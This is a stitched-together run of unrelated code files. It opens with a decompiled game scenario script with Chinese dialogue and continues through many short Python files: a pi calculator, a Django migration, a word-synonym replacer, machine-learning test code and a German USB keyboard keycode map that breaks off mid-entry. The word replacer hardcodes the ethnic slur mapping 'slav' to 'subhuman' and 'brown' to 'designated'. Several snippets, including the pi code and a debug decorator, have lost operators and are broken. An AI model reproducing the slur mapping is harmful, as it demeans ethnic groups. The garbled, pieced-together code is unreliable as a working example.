"OP_40(0x340)"), scpexpr(EXPR_OR), scpexpr(EXPR_EXEC_OP, "OP_40(0x343)"), scpexpr(EXPR_OR), scpexpr(EXPR_EXEC_OP, "OP_40(0x344)"), scpexpr(EXPR_OR), scpexpr(EXPR_EXEC_OP, "OP_40(0x345)"), scpexpr(EXPR_OR), scpexpr(EXPR_END)), "loc_73BA") Jc((scpexpr(EXPR_EXEC_OP, "OP_40(0x35E)"), scpexpr(EXPR_END)), "loc_73B4") OP_A2(0x1C) Jump("loc_73B7") label("loc_73B4") OP_A2(0x1A) label("loc_73B7") Jump("loc_73EC") label("loc_73BA") Jc((scpexpr(EXPR_EXEC_OP, "OP_40(0x35E)"), scpexpr(EXPR_END)), "loc_73EC") Jc((scpexpr(EXPR_EXEC_OP, "OP_40(0x342)"), scpexpr(EXPR_EXEC_OP, "OP_40(0x341)"), scpexpr(EXPR_OR), scpexpr(EXPR_EXEC_OP, "OP_40(0x340)"), scpexpr(EXPR_OR), scpexpr(EXPR_EXEC_OP, "OP_40(0x343)"), scpexpr(EXPR_OR), scpexpr(EXPR_EXEC_OP, "OP_40(0x344)"), scpexpr(EXPR_OR), scpexpr(EXPR_EXEC_OP, "OP_40(0x345)"), scpexpr(EXPR_OR), scpexpr(EXPR_END)), "loc_73E9") OP_A2(0x1C) Jump("loc_73EC") label("loc_73E9") OP_A2(0x1B) label("loc_73EC") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x3, 2)), scpexpr(EXPR_END)), "loc_763C") Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0xA), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_755D") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x3, 1)), scpexpr(EXPR_END)), "loc_7486") TurnDirection(0x102, 0x101, 400) ChrTalk( 0x102, ( "#017F我说，艾丝蒂尔。\x01", "还是先把资料室的书还回去吧？\x02", ) ) CloseMessageWindow() TurnDirection(0x101, 0x102, 400) ChrTalk( 0x101, "#008F啊，对、对啊。\x02", ) CloseMessageWindow() Jump("loc_755A") label("loc_7486") OP_A2(0x19) TurnDirection(0x102, 0x101, 400) ChrTalk( 0x102, ( "#010F艾丝蒂尔，\x01", "说起来我们还没有把资料室的书还回去呢。\x02\x03", "在办理搭乘手续之前\x01", "赶快去一趟中央工房吧。\x02", ) ) CloseMessageWindow() TurnDirection(0x101, 0x102, 400) ChrTalk( 0x101, ( "#000F啊，对了。\x01", "要赶快去一趟中央工房。\x02", ) ) CloseMessageWindow() label("loc_755A") Jump("loc_7639") label("loc_755D") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x3, 1)), scpexpr(EXPR_END)), "loc_75AA") ChrTalk( 0x102, ( "#010F在办理搭乘手续之前\x01", "先要把书还给资料室。\x02", ) ) CloseMessageWindow() Jump("loc_7639") label("loc_75AA") OP_A2(0x19) TurnDirection(0x102, 0x101, 400) ChrTalk( 0x102, ( "#010F说起来，\x01", "我们还没有把资料室的书还回去呢。\x02\x03", "在办理搭乘手续之前\x01", "赶快去一趟中央工房吧。\x02", ) ) CloseMessageWindow() label("loc_7639") Jump("loc_7BE3") label("loc_763C") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x3, 3)), scpexpr(EXPR_END)), "loc_7868") Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0xA), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_7781") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x3, 1)), scpexpr(EXPR_END)), "loc_76DE") TurnDirection(0x102, 0x101, 400) ChrTalk( 0x102, ( "#010F我说，艾丝蒂尔。\x01", "要先去地下工场\x01", "把信交给菲小姐啊。\x02", ) ) CloseMessageWindow() TurnDirection(0x101, 0x102, 400) ChrTalk( 0x101, "#000F嗯，走吧。\x02", ) CloseMessageWindow() Jump("loc_777E") label("loc_76DE") OP_A2(0x19) TurnDirection(0x102, 0x101, 400) ChrTalk( 0x102, ( "#010F艾丝蒂尔，\x01", "我们最好先去把信送给菲小姐。\x02\x03", "在办理搭乘手续之前\x01", "去一趟地下工场吧。\x02", ) ) CloseMessageWindow() TurnDirection(0x101, 0x102, 400) ChrTalk( 0x101, "#004F哦，对了。\x02", ) CloseMessageWindow() label("loc_777E") Jump("loc_7865") label("loc_7781") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x3, 1)), scpexpr(EXPR_END)), "loc_77DA") ChrTalk( 0x102, ( "#010F我们要先去把信交给菲小姐啊。\x01", "　\x02", ) ) CloseMessageWindow() Jump("loc_7865") label("loc_77DA") OP_A2(0x19) TurnDirection(0x102, 0x101, 400) ChrTalk( 0x102, ( "#010F说起来，\x01", "还没有还没把信送给菲小姐呢。\x02\x03", "在办理搭乘手续之前\x01", "赶快去地下工场吧。\x02", ) ) CloseMessageWindow() label("loc_7865") Jump("loc_7BE3") label("loc_7868") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x3, 4)), scpexpr(EXPR_END)), "loc_7BE3") Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0xA), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_7A77") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x3, 1)), scpexpr(EXPR_END)), "loc_794F") TurnDirection(0x102, 0x101, 400) ChrTalk( 0x102, ( "#010F我说，艾丝蒂尔。\x01", "书和信都还没送到呢，\x01", "赶快去一趟中央工房吧。\x02", ) ) CloseMessageWindow() TurnDirection(0x101, 0x102, 400) ChrTalk( 0x101, ( "#000F对啊。\x02\x03", "是二楼的资料室\x01", "和地下工场的菲小姐对吧。\x02", ) ) CloseMessageWindow() Jump("loc_7A74") label("loc_794F") OP_A2(0x19) TurnDirection(0x102, 0x101, 400) ChrTalk( 0x102, ( "#010F说起来，\x01", "我们还没有把书还回资料室……\x02\x03", "而且还得把信送给菲小姐。\x01", "　\x02\x03", "在办理搭乘手续之前\x01", "赶快去一趟中央工房吧。\x02", ) ) CloseMessageWindow() TurnDirection(0x101, 0x102, 400) ChrTalk( 0x101, ( "#000F啊，对了。\x02\x03", "菲小姐在地下工场，\x01", "而资料室在二楼对吧。\x02", ) ) CloseMessageWindow() label("loc_7A74") Jump("loc_7BE3") label("loc_7A77") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x3, 1)), scpexpr(EXPR_END)), "loc_7B24") TurnDirection(0x102, 0x101, 400) ChrTalk( 0x102, ( "#010F我们还没有把书还回资料室，\x01", "而且信也没有送到。\x01", "　\x02\x03", "要赶快去一趟\x01", "中央工房的资料室和地下工场。\x02", ) ) CloseMessageWindow() Jump("loc_7BE3") label("loc_7B24") OP_A2(0x19) TurnDirection(0x102, 0x101, 400) ChrTalk( 0x102, ( "#014F说起来，\x01", "我们还没有把书还回资料室……\x02\x03", "而且还得把信送给菲小姐。\x01", "　\x02\x03", "在办理搭乘手续之前\x01", "赶快去中央工房把它们送到吧。\x02", ) ) CloseMessageWindow() label("loc_7BE3") OP_90(0x0, 0x0, 0x0, 0xFFFFFA24, 0xBB8, 0x0) Sleep(50) EventEnd(0x4) Return() # Function_53_7383 end def Function_54_7BFF(): pass label("Function_54_7BFF") SetPlaceName(0x85) # 蔡斯飞艇坪 Return() # Function_54_7BFF end def Function_55_7C03(): pass label("Function_55_7C03") SetPlaceName(0x81) # 蔡斯飞艇坪 Return() # Function_55_7C03 end SaveToFile() Try(main)
x, y = map( int, input().split()) print( y//x)
import math def sqrt(n,MAX): float_max=10*16 n_float=float((nfloat_max)//MAX)/float_max curr=(int(float_maxmath.sqrt(n_float))MAX)//float_max n_MAX=nMAX while True: prev=curr curr=(curr+n_MAX//curr)//2 if curr==prev: break return curr def power(n): if n==0: return 1 ans=power(n//2) if n%2==0: return ansans return ansans10 def pi(): MAX=power(100000) c=(640320*3)//24 n=1 a_n=MAX a_summation=MAX b_summation=0 while a_n!=0: a_n=-(6n-5)(2n-1)(6n-1) a_n//=nnnc a_summation+=a_n b_summation+=na_n n+=1 ans=(426880sqrt(10005MAX,MAX)MAX)//(13591409a_summation+545140134b_summation) return ans p=str(pi()) p='3.'+p[1:] t=int(raw_input()) while t: t-=1 n=int(raw_input()) print p[:n+2]
from gramps.version import major_version register(GRAMPLET, id = "PropertyEditor", name = _("PropertyEditor"), description = _("Gramplet to edit attributes of multiple objects"), status = STABLE, version = '1.1.1', gramps_target_version = major_version, fname = "PropertyEditor.py", gramplet = 'PropertyEditor', height = 375, detached_width = 510, detached_height = 480, expand = True, gramplet_title = _("PropertyEditor"), help_url="PropertyEditor Gramplet", include_in_listing = True, #navtypes=["Source"], )
import thesaurus # global lists articles = ["the", "a", "an", "this", "that", "it", "its", "all", "thing"] marker_words = ["before", "after", "because", "since", "in order to", "although", "though", "whenever", "wherever", "whether", "while", "even though", "even if", "at one point"] prepositions = [ "aboard", "about", "above", "across", "after", "against", "along", "amid", "among", "anti", "around", "as", "at", "before", "behind", "below", "beneath", "beside", "besides", "between", "beyond", "but", "by", "concerning", "considering", "despite", "down", "during", "except", "excepting", "excluding", "following", "for", "from", "in", "inside", "into", "like", "minus", "near", "of", "off", "on", "onto", "opposite", "outside", "over", "past", "per", "plus", "regarding", "round", "save", "since", "than", "through", "to", "toward", "towards", "under", "underneath", "unlike", "until", "up", "upon", "versus", "via", "with", "within", "without" ] vowels = ["a", "e", "i", "o", "u"] fanboys = ["for", "and", "nor", "but", "or", "yet", "so"] numbers = ["one", "two", "three", "four", "five", "six", "seven", "eight", "nine", "ten", "eleven", "dozen"] be_verbs = ["to", "will", "be", "is", "being", "was", "were", "has", "have", "won't", "didn't", "doesn't", "it's"] pronouns = ["I", "you", "he", "she", "it", "I'm", "me", "we", "us", "they", "him", "her", "my"] # enum for word types class WordType: article = 0 noun = 1 proper_noun = 2 verb = 3 adverb = 4 adjective = 5 fanboys = 6 preposition = 7 marker = 8 other = 9 class Word: def __init__(self, word, theo): self.word = word self.word_type = WordType.other self.synonym = word self.theo = theo self.anal_word(self.word) def is_article(self, word): return (word.lower() in articles) def is_preposition(self, word): return (word.lower() in prepositions) def is_fanboys(self, word): return (word.lower() in fanboys) def is_proper_noun(self, word): if len(word) > 0: return (word[0].isupper()) else: return False def get_word_type(self): return self.word_type def get_synonym(self): return self.synonym def get_og_word(self): return self.word def is_verb(self, word): return ("ing" == word[-3:] or "ed" == word[-2:] or "s" == word[-1:]) def process_verb(self, word): temp = "" if "ing" == word[-3:]: temp = "ing" elif "ed" == word[-2:]: if word[-4][0] in vowels: temp = "d" else: temp = "ed" elif "s" == word[-1:]: temp = "s" word = word.replace(temp, "") self.lookup_helper(word) if temp == "d" or temp == "ed": if self.synonym[-1:][0] == "e": temp = "d" else: temp = "ed" self.synonym += temp def lookup_helper(self, word): res = self.theo.lookup_word(word) self.word_type = res.get_word_type() if self.word_type == "adj": self.word_type = WordType.adjective elif self.word_type == "adv": self.word_type = WordType.adverb elif self.word_type == "noun": self.word_type = WordType.noun elif self.word_type == "verb": self.word_type = WordType.verb self.synonym = res.get_synonym() def is_number(self, word): return (word in numbers) def is_pronoun(self, word): return (word in pronouns) def is_possessive(self, word): return (word[-2:] == "'s" or word[-2:] == "s'") def is_marker(self, word): return (word in marker_words) def is_be_verb(self, word): return (word in be_verbs) def process_possessive(self, word): temp = "" if word[-2:] == "'s" or word[-2:] == "s'": temp = word[-2:] word = word.replace(temp, "") self.lookup_helper(word) self.synonym += "'s" def anal_word(self, word): """ analyze the word, determine its type and suggested synonym """ # check for designated if word.lower() == "brown" or word.lower() == "slav": if word.lower() == "brown": self.word_type = WordType.adjective self.synonym = "designated" if word.lower() == "slav": self.word_type = WordType.noun self.synonym = "subhuman" else: # if the word is special, leave the word alone if self.is_article(word): self.word_type = WordType.article self.synonym = word elif self.is_be_verb(word): self.word_type = WordType.verb self.synonym = word elif self.is_pronoun(word): self.word_type = WordType.article self.synonym = word elif self.is_proper_noun(word): self.word_type = WordType.proper_noun self.synonym = word elif self.is_fanboys(word): self.word_type = WordType.fanboys self.synonym = word elif self.is_preposition(word): self.word_type = WordType.preposition self.synonym = word elif self.is_marker(word): self.word_type = WordType.marker self.synonym = word elif self.is_number(word): self.word_type = WordType.adjective self.synonym = word elif self.is_verb(word): self.process_verb(word) elif self.is_possessive(word): self.process_possessive(word) else: # if the word is a noun, or adjective, query the thesaurus service self.lookup_helper(word) def main(): theo = thesaurus.Thesaurus() test = "" words = test.split(" ") new_sentence = "" for word in words: w = Word(word, theo) new_sentence += w.get_synonym() + " " print new_sentence if __name__ == "__main__": main()
# Generated by Django 2.2.11 on 2020-04-13 12:12 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('wishlist', '0009_auto_20200413_0008'), ] operations = [ migrations.RemoveField( model_name='wishlistmodel', name='price', ), migrations.AddField( model_name='wishlistmodel', name='price_1', field=models.DecimalField(decimal_places=2, default=0, max_digits=10, verbose_name='Цена 1,5'), ), migrations.AddField( model_name='wishlistmodel', name='price_2', field=models.DecimalField(decimal_places=2, default=0, max_digits=10, verbose_name='Цена 2'), ), migrations.AddField( model_name='wishlistmodel', name='price_3', field=models.DecimalField(decimal_places=2, default=0, max_digits=10, verbose_name='Цена семья'), ), migrations.AddField( model_name='wishlistmodel', name='price_4', field=models.DecimalField(decimal_places=2, default=0, max_digits=10, verbose_name='Цена Евро'), ), ]
import fenics as fa import math import numpy as np import matplotlib.pyplot as plt import os.path import pickle from sklearn.neural_network import MLPRegressor from sklearn.metrics import mean_squared_error from .. import arguments from ..collector.driver_sobol import solver_fluctuation def RVE(args, parameters_list): W = [] for i, parameters in enumerate(parameters_list): print("\ni is {}".format(i)) args.F_list_fixed = [[parameters[0], parameters[1]], [ parameters[2], parameters[3]]] args.def_grad = np.array(parameters[0:4]) args.void_shape = np.array(parameters[4:6]) w, _ = solver_fluctuation(args) W.append(w) return np.asarray(W) def from_H_to_C(parameters): parameters[0] = parameters[0] + 1 parameters[3] = parameters[3] + 1 parameters_new = np.zeros(4) parameters_new[0] = parameters[0] * \ parameters[0] + parameters[2] * parameters[2] parameters_new[1] = parameters[0] * \ parameters[1] + parameters[2] * parameters[3] parameters_new[2] = parameters[1] * \ parameters[1] + parameters[3] * parameters[3] parameters_new[3] = parameters[4] return parameters_new def NN(parameters_list): regr = pickle.load(open('saved_weights/model.sav', 'rb')) shift = np.load('saved_weights/mean.npy') W = [] for i, parameters in enumerate(parameters_list): parameters_new = from_H_to_C(parameters) parameters_new = parameters_new - shift w = regr.predict(parameters_new.reshape(1, -1)) W.append(w) return np.asarray(W) def run_single(args, pore_shape, H22, H12): if pore_shape == 0: parameters_list_1 = [np.array([0, 0, 0, h22, 0, 0]) for h22 in H22] parameters_list_2 = [np.array([0, h12, 0, 0, 0, 0]) for h12 in H12] else: parameters_list_1 = [ np.array([0, 0, 0, h22, -0.2, 0.2]) for h22 in H22] parameters_list_2 = [ np.array([0, h12, 0, 0, -0.2, 0.2]) for h12 in H12] # W_RVE_H12 = RVE(args, parameters_list_2) # np.save('plots/new_data/numpy/custom_testing/W_RVE_H12_pore' + # str(pore_shape) + '.npy', W_RVE_H12) # W_RVE_H22 = RVE(args, parameters_list_1) # np.save('plots/new_data/numpy/custom_testing/W_RVE_H22_pore' + # str(pore_shape) + '.npy', W_RVE_H22) W_NN_H22 = NN(parameters_list_1) np.save('plots/new_data/numpy/custom_testing/W_NN_H22_pore' + str(pore_shape) + '.npy', W_NN_H22) W_NN_H12 = NN(parameters_list_2) np.save('plots/new_data/numpy/custom_testing/W_NN_H12_pore' + str(pore_shape) + '.npy', W_NN_H12) def run(args): H22 = np.linspace(-0.2, 0.2, 41) np.save('plots/new_data/numpy/custom_testing/H22.npy', H22) H12 = np.linspace(-0.2, 0.2, 41) np.save('plots/new_data/numpy/custom_testing/H12.npy', H12) run_single(args, 0, H22, H12) run_single(args, 2, H22, H12) plot_results() def plot_results(): H22 = np.load('plots/new_data/numpy/custom_testing/H22.npy') H12 = np.load('plots/new_data/numpy/custom_testing/H12.npy') W_NN_H22_pore0 = np.load( 'plots/new_data/numpy/custom_testing/W_NN_H22_pore0.npy') W_NN_H12_pore0 = np.load( 'plots/new_data/numpy/custom_testing/W_NN_H12_pore0.npy') W_RVE_H22_pore0 = np.load( 'plots/new_data/numpy/custom_testing/W_RVE_H22_pore0.npy') W_RVE_H12_pore0 = np.load( 'plots/new_data/numpy/custom_testing/W_RVE_H12_pore0.npy') W_NN_H22_pore2 = np.load( 'plots/new_data/numpy/custom_testing/W_NN_H22_pore2.npy') W_NN_H12_pore2 = np.load( 'plots/new_data/numpy/custom_testing/W_NN_H12_pore2.npy') W_RVE_H22_pore2 = np.load( 'plots/new_data/numpy/custom_testing/W_RVE_H22_pore2.npy') W_RVE_H12_pore2 = np.load( 'plots/new_data/numpy/custom_testing/W_RVE_H12_pore2.npy') case_H22_NN = np.concatenate((W_NN_H22_pore0, W_NN_H22_pore2)) case_H22_RVE = np.concatenate((W_RVE_H22_pore0, W_RVE_H22_pore2)) MSE_test_case_H22 = mean_squared_error(case_H22_RVE, case_H22_NN) print("MSE_test_case_H22", MSE_test_case_H22) case_H12_NN = np.concatenate((W_NN_H12_pore0, W_NN_H12_pore2)) case_H12_RVE = np.concatenate((W_RVE_H12_pore0, W_RVE_H12_pore2)) MSE_test_case_H12 = mean_squared_error(case_H12_RVE, case_H12_NN) print("MSE_test_case_H12", MSE_test_case_H12) exit() plt.figure(0) plt.plot(H22, W_RVE_H22_pore0 - W_RVE_H22_pore0[20], linestyle='-', color='blue') plt.plot(H22, W_NN_H22_pore0 - W_NN_H22_pore0[20], linestyle='--', color='blue') plt.plot(H22, W_RVE_H22_pore2 - W_RVE_H22_pore2[20], linestyle='-', color='red') plt.plot(H22, W_NN_H22_pore2 - W_NN_H22_pore2[20], linestyle='--', color='red') plt.tick_params(labelsize=14) plt.figure(1) plt.plot(H12, W_RVE_H12_pore0 - W_RVE_H12_pore0[20], linestyle='-', color='blue') plt.plot(H12, W_NN_H12_pore0 - W_NN_H12_pore0[20], linestyle='--', color='blue') plt.plot(H12, W_RVE_H12_pore2 - W_RVE_H12_pore2[20], linestyle='-', color='red') plt.plot(H12, W_NN_H12_pore2 - W_NN_H12_pore2[20], linestyle='--', color='red') plt.tick_params(labelsize=14) plt.show() if __name__ == '__main__': args = arguments.args args.relaxation_parameter = 0.1 args.max_newton_iter = 1000 args.n_cells = 2 args.fluctuation = True args.enable_fast_solve = True args.metamaterial_mesh_size = 15 run(args)
""" inversion a list using stack """ from example_stack import ArrayStack def reverse_list(data): # modify the list in place if len(data) <= 1: return S = ArrayStack() for each in data: S.push(each) for i in range(len(data)): data[i] = S.pop() if __name__ == '__main__': data = [1,2,4,6,7,5,10] print(data) reverse_list(data) print(data) data2 = [3] print(data2) reverse_list(data2) print(data2)
#from esp32ap import Esp32Ap #from ads1299 import Ads1299 #import utime #from machine import SPI,Pin #import utime #import struct #from ads1299 import * #from spitest import * from amplifier import * if __name__ == '__main__': main()
import unittest import sys from pathlib import Path from typing import Tuple, Optional, Dict, Callable import os import requests class ValidationTestCase(unittest.TestCase): repo_base: str = None # Base URI or directory name file_suffix: str = None # file suffix (e.g. ".shex") start_at: Optional[str] = "" # Start at or after this skip: Dict[str, str] = dict() # Filename / reason for skip array validation_function: Callable[[str], bool] = None # single_file: bool = False # True means process exactly one file stop_on_error: bool = False # True means stop once you encounter an error number_of_errors: int = 0 # Number of errors detected @classmethod def make_test_function(cls, url): def test(self): if not cls.stop_on_error or not cls.number_of_errors: rval = cls.validation_function(url) if not rval: cls.number_of_errors += 1 self.fail("Validation failure") return test @classmethod def build_test_harness(cls) -> None: started = not bool(cls.start_at) cls.number_of_errors = 0 for fname, fpath in (cls.enumerate_http_files(cls.repo_base) if ':' in cls.repo_base else cls.enumerate_directory(cls.repo_base, cls.file_suffix)): if fname.endswith(cls.file_suffix): rel_fpath = os.path.relpath(fpath, cls.repo_base) if started or rel_fpath.startswith(cls.start_at): if rel_fpath not in cls.skip: started = True test_func = cls.make_test_function(fpath) # Create a test name relative to repo_base test_name = '.'.join(['test_' + e for e in rel_fpath.split('/')]).rsplit('.', 1)[0] setattr(cls, test_name, test_func) if cls.single_file: break else: print(f"***** Skipped: {rel_fpath} - {cls.skip[rel_fpath]}") @staticmethod def enumerate_http_files(url) -> Tuple[str, str]: resp = requests.get(url) if resp.ok: for f in resp.json(): yield f['name'], f['download_url'] else: print("Error {}: {}".format(resp.status_code, resp.reason), file=sys.stderr) @staticmethod def enumerate_directory(dir_, sfx: str) -> Tuple[str, str]: for fpath in list(Path(dir_).rglob(f"*{sfx}")): yield os.path.basename(fpath), str(fpath) def blank_test(self): self.assertTrue(True)
# 567. Permutation in String # # Given two strings s1 and s2, write a function to return true if s2 contains the permutation of s1. # In other words, one of the first string's permutations is the substring of the second string. # Example 1: # Input:s1 = "ab" s2 = "eidbaooo" # Output:True # Explanation: s2 contains one permutation of s1 ("ba"). # Example 2: # Input:s1= "ab" s2 = "eidboaoo" # Output: False import collections class Solution(object): def checkInclusion(self, s1, s2): """ :type s1: str :type s2: str :rtype: bool """ begin = end = 0 pStillNeed = collections.Counter(s1) counter = len(pStillNeed) while end < len(s2): c = s2[end] if c in pStillNeed: pStillNeed[c] -= 1 if pStillNeed[c] == 0: counter -= 1 end += 1 while counter == 0: tempc = s2[begin] if tempc in pStillNeed: pStillNeed[tempc] += 1 if pStillNeed[tempc] > 0: counter += 1 if len(s1) == end - begin: return True begin += 1 return False if __name__ == '__main__': sol = Solution() assert sol.checkInclusion('ab', 'eidbaooo') == True assert sol.checkInclusion('ab', 'eidboaoo') == False
from functools import wraps, partial def debug(func): @wraps(func) def wrapper(args, kwargs): print(func.__qualname__) return func(args, **kwargs) return wrapper def debug_v(func): print(func.__name__) return func # basically just patch def debugmethods(cls): for key, val in vars(cls).items(): if callable(val): setattr(cls, key, debug(val)) return cls # basically just patch def debugattr(cls): orig_getattribute__ = cls.__getattribute__ def __getattribute__(self, name): print('Get:', name) return orig_getattribute__(self, name) cls.__getattribute__ = __getattribute__ return cls
from django.contrib import admin from .models import Rock, Material, RockComposition admin.site.register(Rock) admin.site.register(Material) admin.site.register(RockComposition)
import pandas as pd import numpy as np # coding=utf8 if __name__=='__main__': input_file=r'/home/leon/db/BOB投注属性表.txt' with open(input_file,'r',newline='',encoding='utf8') as filereader: for row in filereader: print("{}".format(row.strip()))
import os import cv2 import numpy as np from util import BBox def flip(img, bbox, landmark): """ Flip image horizontally as well as the bbox and landmark. param: -img, the original image -landmark, using absolute coordinates """ # horizontally flip the image img_flipped = cv2.flip(img.copy(), 1) # horizontally flip the bbox and crop the bbox region bbox_flipped = BBox([img.shape[1] - bbox.right, img.shape[1] - bbox.left, bbox.top, bbox.bottom]) img_flipped = img_flipped[int(bbox_flipped.top):int(bbox_flipped.bottom) + 1, int(bbox_flipped.left):int(bbox_flipped.right) + 1] # horizontally flip the landmark landmark_flipped = np.asarray([(img.shape[1]-x, y) for (x, y) in landmark]) # exchange the right eye and left eye, right mouth corner and left mouth corner # however, this may not be needed landmark_flipped[[0, 1]] = landmark_flipped[[1, 0]] landmark_flipped[[3, 4]] = landmark_flipped[[4, 3]] return (img_flipped, bbox_flipped, landmark_flipped) def rotate(img, bbox, landmark, alpha): """ Given an image with bbox and landmark, rotate it with (angle in degrees) alpha and return rotated face with bbox and landmark (absolute coordinates) param: -img, the original image -landmark, using absolute coordinates -alpha, rotation angle in degrees """ # get rotation matrix center = (float(bbox.left + bbox.right) / 2, float(bbox.top + bbox.bottom) / 2) rot_mat = cv2.getRotationMatrix2D(center, alpha, 1) # apply rotation, (img.shape[1], img.shape[0]) means (width, height) img_rotated = cv2.warpAffine(img.copy(), rot_mat, (img.shape[1], img.shape[0])) # calculate new landmark landmark_rotated = np.asarray([(rot_mat[0][0] * x + rot_mat[0][1] * y + rot_mat[0][2], rot_mat[1][0] * x + rot_mat[1][1] * y + rot_mat[1][2]) for (x, y) in landmark]) face_cropped = img_rotated[int(bbox.top):int(bbox.bottom) + 1, int(bbox.left):int(bbox.right) + 1] return (img_rotated, face_cropped, landmark_rotated)
import os def model(num_subjects,dir): mat_txt = ['/NumWaves 1', '/NumPoints %d' % num_subjects, '/PPheights %e' % 1, '', '/Matrix'] for i in range(num_subjects): mat_txt += ['%e' % 1] mat_txt = '\n'.join(mat_txt) con_txt = ['/ContrastName1 group mean', '/NumWaves 1', '/NumContrasts 1', '/PPheights %e' % 1, '/RequiredEffect 100.0', '', '/Matrix', '%e' % 1] con_txt = '\n'.join(con_txt) grp_txt = ['/NumWaves 1', '/NumPoints %d' % num_subjects, '', '/Matrix'] for i in range(num_subjects): grp_txt += ['1'] grp_txt = '\n'.join(grp_txt) txt = {'design.mat': mat_txt, 'design.con': con_txt, 'design.grp': grp_txt} # write design files for i, name in enumerate(['design.mat', 'design.con', 'design.grp']): f = open(os.path.join(dir, name), 'wt') f.write(txt[name]) f.close()
iModNone = 0 iModLCtrl = 1 << 0 iModLShift = 1 << 1 iModLAlt = 1 << 2 iModLWin = 1 << 3 iModRCtrl = 1 << 4 iModRShift = 1 << 5 iModRAlt = 1 << 6 iModRSuper = 1 << 7 bModCtrl = "0x%x" % iModLCtrl bModShift = "0x%x" % iModLShift bModAlt = "0x%x" % iModLAlt bModWin = "0x%x" % iModLWin bNull = "0x00" bReleaseAll = bytes(int(x,0) for x in [bNull, bNull, bNull, bNull, bNull, bNull, bNull, bNull]) # print("0x%x" % (iModLCtrl \| iModLAlt)) Printables = {} Printables["de_DE"] = { 'A' : ("0x04", "0x%x" % iModLShift, False), 'a' : ("0x04", "0x%x" % iModNone, False), 'B' : ("0x05", "0x%x" % iModLShift, False), 'b' : ("0x05", "0x%x" % iModNone, False), 'C' : ("0x06", "0x%x" % iModLShift, False), 'c' : ("0x06", "0x%x" % iModNone, False), 'D' : ("0x07", "0x%x" % iModLShift, False), 'd' : ("0x07", "0x%x" % iModNone, False), 'E' : ("0x08", "0x%x" % iModLShift, False), 'e' : ("0x08", "0x%x" % iModNone, False), 'F' : ("0x09", "0x%x" % iModLShift, False), 'f' : ("0x09", "0x%x" % iModNone, False), 'G' : ("0x0a", "0x%x" % iModLShift, False), 'g' : ("0x0a", "0x%x" % iModNone, False), 'H' : ("0x0b", "0x%x" % iModLShift, False), 'h' : ("0x0b", "0x%x" % iModNone, False), 'I' : ("0x0c", "0x%x" % iModLShift, False), 'i' : ("0x0c", "0x%x" % iModNone, False), 'J' : ("0x0d", "0x%x" % iModLShift, False), 'j' : ("0x0d", "0x%x" % iModNone, False), 'K' : ("0x0e", "0x%x" % iModLShift, False), 'k' : ("0x0e", "0x%x" % iModNone, False), 'L' : ("0x0f", "0x%x" % iModLShift, False), 'l' : ("0x0f", "0x%x" % iModNone, False), 'M' : ("0x10", "0x%x" % iModLShift, False), 'm' : ("0x10", "0x%x" % iModNone, False), 'N' : ("0x11", "0x%x" % iModLShift, False), 'n' : ("0x11", "0x%x" % iModNone, False), 'O' : ("0x12", "0x%x" % iModLShift, False), 'o' : ("0x12", "0x%x" % iModNone, False), 'P' : ("0x13", "0x%x" % iModLShift, False), 'p' : ("0x13", "0x%x" % iModNone, False), 'Q' : ("0x14", "0x%x" % iModLShift, False), 'q' : ("0x14", "0x%x" % iModNone, False), 'R' : ("0x15", "0x%x" % iModLShift, False), 'r' : ("0x15", "0x%x" % iModNone, False), 'S' : ("0x16", "0x%x" % iModLShift, False), 's' : ("0x16", "0x%x" % iModNone, False), 'T' : ("0x17", "0x%x" % iModLShift, False), 't' : ("0x17", "0x%x" % iModNone, False), 'U' : ("0x18", "0x%x" % iModLShift, False), 'u' : ("0x18", "0x%x" % iModNone, False), 'V' : ("0x19", "0x%x" % iModLShift, False), 'v' : ("0x19", "0x%x" % iModNone, False), 'W' : ("0x1a", "0x%x" % iModLShift, False), 'w' : ("0x1a", "0x%x" % iModNone, False), 'X' : ("0x1b", "0x%x" % iModLShift, False), 'x' : ("0x1b", "0x%x" % iModNone, False), 'Y' : ("0x1c", "0x%x" % iModLShift, False), 'y' : ("0x1c", "0x%x" % iModNone, False), 'Z' : ("0x1d", "0x%x" % iModLShift, False), 'z' : ("0x1d", "0x%x" % iModNone, False), '0' : ("0x27", "0x%x" % iModNone, False), '1' : ("0x1e", "0x%x" % iModNone, False), '2' : ("0x1f", "0x%x" % iModNone, False), '3' : ("0x20", "0x%x" % iModNone, False), '4' : ("0x21", "0x%x" % iModNone, False), '5' : ("0x22", "0x%x" % iModNone, False), '6' : ("0x23", "0x%x" % iModNone, False), '7' : ("0x24", "0x%x" % iModNone, False), '8' : ("0x25", "0x%x" % iModNone, False), '9' : ("0x26", "0x%x" % iModNone, False), ' ' : ("0x2c", "0x%x" % iModNone, False), '!' : ("0x1e", "0x%x" % iModLShift, False), '\"' : ("0x1f", "0x%x" % iModLShift, False), '#' : ("0x31", "0x%x" % iModNone, False), '$' : ("0x21", "0x%x" % iModLShift, False), '%' : ("0x22", "0x%x" % iModLShift, False), '&' : ("0x23", "0x%x" % iModLShift, False), '\'' : ("0x31", "0x%x" % iModLShift, False), '(' : ("0x25", "0x%x" % iModLShift, False), ')' : ("0x26", "0x%x" % iModLShift, False), '' : ("0x30", "0x%x" % iModLShift, False), '+' : ("0x30", "0x%x" % iModNone, False), '´' : ("0x2e", "0x%x" % iModNone, True), '-' : ("0x38", "0x%x" % iModNone, False), '.' : ("0x37", 